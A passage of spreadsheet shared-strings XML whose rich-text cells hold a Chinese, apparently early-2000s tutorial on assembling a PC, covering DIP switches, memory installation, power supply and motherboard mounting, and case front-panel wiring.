        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>486</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>586</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>时代大大减少了。而</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关则是一组组合开关（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关），通常可控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的倍频和外频，不过现在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的倍频一般都锁定，所以只有外频调整。此外尽管跳线已经使硬件设置非常灵活，但是跳线的插拔方式毕竟使用起来不太方便。为此，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关开始出现在主板上，使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关，我们可更为直观和容易地设置硬件的工作状态。</t>
    </r>
  </si>
  <si>
    <t>三、安装内存　</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>现在常用的内存有</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>168</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SDRAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>184</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DDR SDRAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存两种，其主要外观区别在于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SDRAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存金手指上有两个缺口，而</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DDR SDRAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存只有一个。</t>
    </r>
  </si>
  <si>
    <r>
      <t>下面我们就以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>184</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DDR SDRAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存安装为例给你讲解。</t>
    </r>
  </si>
  <si>
    <r>
      <t>第一步，安装内存前先要将内存插槽两端的白色卡子向两边扳动，将其打开，这样才能将内存插入。然后再插入内存条，内存条的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个凹槽必须直线对准内存插槽上的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个凸点（隔断）。　</t>
    </r>
  </si>
  <si>
    <t>第二步，再向下按入内存，在按的时候需要稍稍用力。</t>
  </si>
  <si>
    <t>第三步，以使紧压内存的两个白色的固定杆确保内存条被固定住，即完成内存的安装。</t>
  </si>
  <si>
    <r>
      <t>提示：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SDRAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存的安装和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DDR</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存的安装基本一样。差别在于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SDRAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内存及其插槽上有两个对应缺口。内存的两端各有一个缺口，其正好和内存插槽两端的白色卡子对应，如果内存插到位，该卡子会卡在内存的缺口中。如果内存插到底，两端的卡子还是不能自动合拢，你可用手将其扳到位。</t>
    </r>
  </si>
  <si>
    <t>四、安装电源　　</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一般情况下，我们在购买机箱的时侯可以买已装好了电源的。不过，有时机箱自带的电源品质太差，或者不能满足特定要求，则需要更换电源。由于电脑中的各个配件基本上都已模块化，因此更换起来很容易，电源也不例外，下面，我们就来看看如何安装电源：</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装电源很简单，先将电源放进机箱上的电源位，并将电源上的螺丝固定孔与机箱上的固定孔对正。然后再先拧上一颗螺钉（固定住电源即可），然后将最后</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颗螺钉孔对正位置，再拧上剩下的螺钉即可。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>需要注意的是，在安装电源时，首先要做的就是将电源放入机箱内，这个过程中要注意电源放入的方向，有些电源有两个风扇，或者有一个排风口，则其中一个风扇或排风口应对着主板，放入后稍稍调整，让电源上的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个螺钉和机箱上的固定孔分别对齐。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源提供多组插头，其中主要是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>20</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯的主板插头、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯的驱动器插头和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯的小驱动器专用插头。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>20</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯的主板插头只有一个且具有方向性，可以有效地防止误插，插头上还带有固定装置可以钩住主板上的插座，不至于让接头松动导致主板在工作状态下突然断电。四芯的驱动器电源插头用处最广泛，所有的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD-ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DVD-ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD-RW</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、硬盘甚至部分风扇都要用动它。四芯插头提供了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+12V</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+5V</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两组电压，一般黄色电线代表</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+12V</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源，红色电线代表</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+5V</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源，黑色电线代表</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>OV</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地线。这种四芯插头电源提供的数量是最多的，如果用户觉得还不够用，可以使用一转二的转接线。四芯小驱动器专用插头原理和普通四芯插头是一样的，只是接口形式不同罢了，是专为传统的小驱供电设计的。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>五、主板的安装　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在主板上装好</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和内存后，我们即可将主板装入机箱中。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在安装主板前我们先来认识一下机箱（上图），大家知道，机箱的整个机架由金属组成。其</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>寸固定架，可以安装几个设备，比如光驱等；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>寸固定架，是来固定小软驱、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>寸硬盘等；电源固定架，是用来固定电源。而机箱下部那块大的铁板用来固定主板，我们在此称之为底板，上面的很多固定孔是用来上铜柱或塑料钉来固定主板的，现在的机箱在出厂时一般就已经将固定柱安装好。而机箱背部的槽口是用来固定板卡及打印口和鼠标口的，在机箱的四面还有四个塑料脚垫。不同的机箱固定主板的方法不一样，像我们正在安装的这种，它全部采用螺钉固定，稳固程度很高，但要求各个螺钉的位置必须精确。主板上一般有</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>7</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个固定孔，你要选择合适的孔与主板匹配，选好以后，把固定螺钉旋紧在底板上，（现在的大多机箱已经安装了固定柱，而且位置都是正确的，不用我们再单独安装了）。然后把主板小心地放在上面，注意将主板上的键盘口、鼠标口、串并口等和机箱背面挡片的孔对齐，使所有螺钉对准主板的固定孔，依次把每个螺丝安装好。总之，要求主板与底板平行，决不能碰在一起，否则容易造成短路。</t>
    </r>
  </si>
  <si>
    <t>第一步，首先将机箱或主板附带的固定主板用的镙丝柱和塑料钉旋入主板和机箱的对应位置；　　</t>
  </si>
  <si>
    <r>
      <t>第二步，然后再将机箱上的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>I/O</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口的密封片撬掉。提示：你可根据主板接口情况，将机箱后相应位置的挡板去掉。这些挡板与机箱是直接连接在一起的，需要先用螺丝刀将其顶开，然后用尖嘴钳将其扳下。外加插卡位置的挡板可根据需要决定，而不要将所有的挡板都取下；</t>
    </r>
  </si>
  <si>
    <r>
      <t>第三步，然后将主板对准</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>I/O</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口放入机箱；</t>
    </r>
  </si>
  <si>
    <t>第四步，最后，将主板固定孔对准镙丝柱和塑料钉，然后用螺丝将主板固定好；　　</t>
  </si>
  <si>
    <r>
      <t>第五步，将电源插头插入主板上的相应插口中。这是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主板上普遍具备的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源接口，你只需将电源上同样外观的插头插入该接口既可完成对</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源的连接。上图是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>P4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主板和电源中独具的电源接头，你可一一对应插好。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、连接机箱接线（下图）　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在安装主板时，许多读者的难点不是将主板放入机箱中，并固定好，而是机箱连接线该怎么用！下面就让我们先来了解一下机箱连接线——　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>①</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喇叭的四芯插头，实际上只有</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两根线，一线通常为红色，它是接在主板</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Speaker</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插针上。这在主板上有标记，通常为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Speaker</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。在连接时，注意红线对应</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的位置（注：红线对应</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的位置——有的主板将正极标为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”有的标为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，适情况而定）。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>②</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RESET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头连着机箱的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RESET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键，它要接到主板上</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RESET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插针上。主板上</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RESET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>针的作用是这样的：当它们短路时，电脑就重新启动。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RESET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键是一个开关，按下它时产生短路，手松开时又恢复开路，瞬间的短路就使电脑重新启动。偶尔会又这样的情况，当你按一下</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RESET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键并松开，但它并没有弹起，一直保持着短路状态，电脑就不停地重新启动。</t>
    </r>
  </si>
  <si>
    <r>
      <t>③</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
